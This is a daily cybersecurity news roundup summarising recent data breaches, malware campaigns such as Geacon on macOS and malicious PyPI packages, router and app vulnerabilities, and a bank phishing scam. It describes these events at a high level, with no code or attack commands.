A Go implementation of Cobalt Strike called Geacon is being used by cybercriminals in attacks against macOS devices. Cyber experts have discovered a couple of payloads on GitHub that can trigger downloading of additional payloads and even result in data exfiltration from the compromised system. In other news, researchers have identified potentially critical bugs in products manufactured by Teltonika. These vulnerabilities affected the company’s RUT241 and RUT955 cellular routers and also the Teltonika Remote Management System (RMS), which could be abused for remote attacks.

Furthermore, Group-IB infiltrated the infrastructure of Qilin RaaS to divulge never-before-heard secrets of its affiliate nexus, which would often target critical sector entities. For instance, affiliates take back 80-85% of the ransomware payments.

Top Breaches Reported in the Last 24 Hours

C-C-C leaks customer data

The private information of customers of Credit Control Corporation (C-C-C) could be at risk owing to a data breach affecting patient accounts. It has been found the attack impacted debt collection accounts for local hospitals and doctor's offices. An unusual activity was identified on March 7th, prompting an immediate investigation that confirmed the copying of certain files from C-C-C's network between March 2 and March 7.

Attack on US DoT

The U.S. Department of Transportation (DOT) announced suffering a data breach that affects the personal information of 237,000 current and former federal government employees. The agency has disabled the TRANServe benefits system which is used to reimburse commuting costs to employees. An official informed that the incident did not cripple any transportation safety systems.

Top Malware Reported in the Last 24 Hours

APT arrives with new payloads

The threat actor known as Water Orthrus was spotted with two new campaigns in March and April 2023 that intended to deliver two CopperStealth and CopperPhish payloads. As monitored by Trend Micro, the financially motivated group packages CopperStealth as installers for free tools on Chinese software-sharing websites. The other campaign spreads CopperPhish with the help of file-sharing websites.

Inside Qilin RaaS operation

According to Group-IB, affiliates connected to the Qilin RaaS group receive 80% to 85% of the ransom payments. Qilin ransomware attacks are tailored to individual victims, employing tactics such as altering encrypted file extensions and selectively terminating processes and services. Its affiliate panel is divided into sections such as Targets, Blogs, News, Stuffers, Payments, and FAQs. The new recruits are equipped with enhanced tools and techniques for their operations.

Exploiting ‘Geacon’ to target macOS

There is a growing trend in utilizing Geacon (a Golang implementation of the Cobalt Strike beacon), to target macOS devices, revealed SentinelOne. In one of the cases, researchers found an AppleScript applet file named "Xu Yiqing’s Resume_20230320.app." The package appeared specifically crafted to first verify its execution on a macOS system and subsequently retrieve an unsigned 'Geacon Plus' payload from a C2 server in China.

Dozens of malicious PyPI packages

Between late March and late April, the FortiGuard Labs team claimed to have detected over 30 zero-day attacks within PyPI packages. Utilizing a Discord webhook, these packages attempt to extract sensitive information like credit card details, wallets, account logins, and more. One set of packages was most probably carrying the BlackCap webhook stealer. Its capabilities also include bypassing VM machines, injection techniques, and more.

Top Vulnerabilities Reported in the Last 24 Hours

Sensitive bugs in Teltonika products

Researchers at Otorio and Claroty studied and analyzed products manufactured by Teltonika Networks and flagged multiple flaws in those. They uncovered eight security types of insecurities in RUT241 and RUT955 cellular routers and also in the Teltonika RMS. Products from Sierra Wireless and InHand Networks were also found affected with different flaws, posing threats such as taking over cloud-managed IIoT devices.

Kids can revoke parental control

Security analysts at SEC Consult reported multiple flaws in the Android app Kiddowares 'Parental Control – Kids Place'. These vulnerabilities could potentially enable attackers to upload arbitrary files onto protected devices, extract user credentials, and allow children to circumvent imposed restrictions without parental detection. Among other threats, its web dashboard is vulnerable to CSRF attacks, meanwhile, a child can even remove all restrictions without anyone noticing.

Bug trio in Advantech EKI series

CyberDanube researchers Thomas Weber and Sebastian Dietz shared details of three vulnerabilities present in Advantech's EKI series of serial device servers. There are two command injection and one buffer overflow vulnerabilities. All the security issues can be triggered via POST request, enabling arbitrary code execution at the operating system level.

Top Scams Reported in the Last 24 Hours

Stealing banking credentials

Customers of Suncorp Bank lately started receiving suspicious emails regarding an account deletion threat. Security experts stated that scammers create a sense of urgency and force recipients to react. The email contains a website URL imitating Suncorp Bank’s landing page. The phishing page intends to harvest users’ login credentials.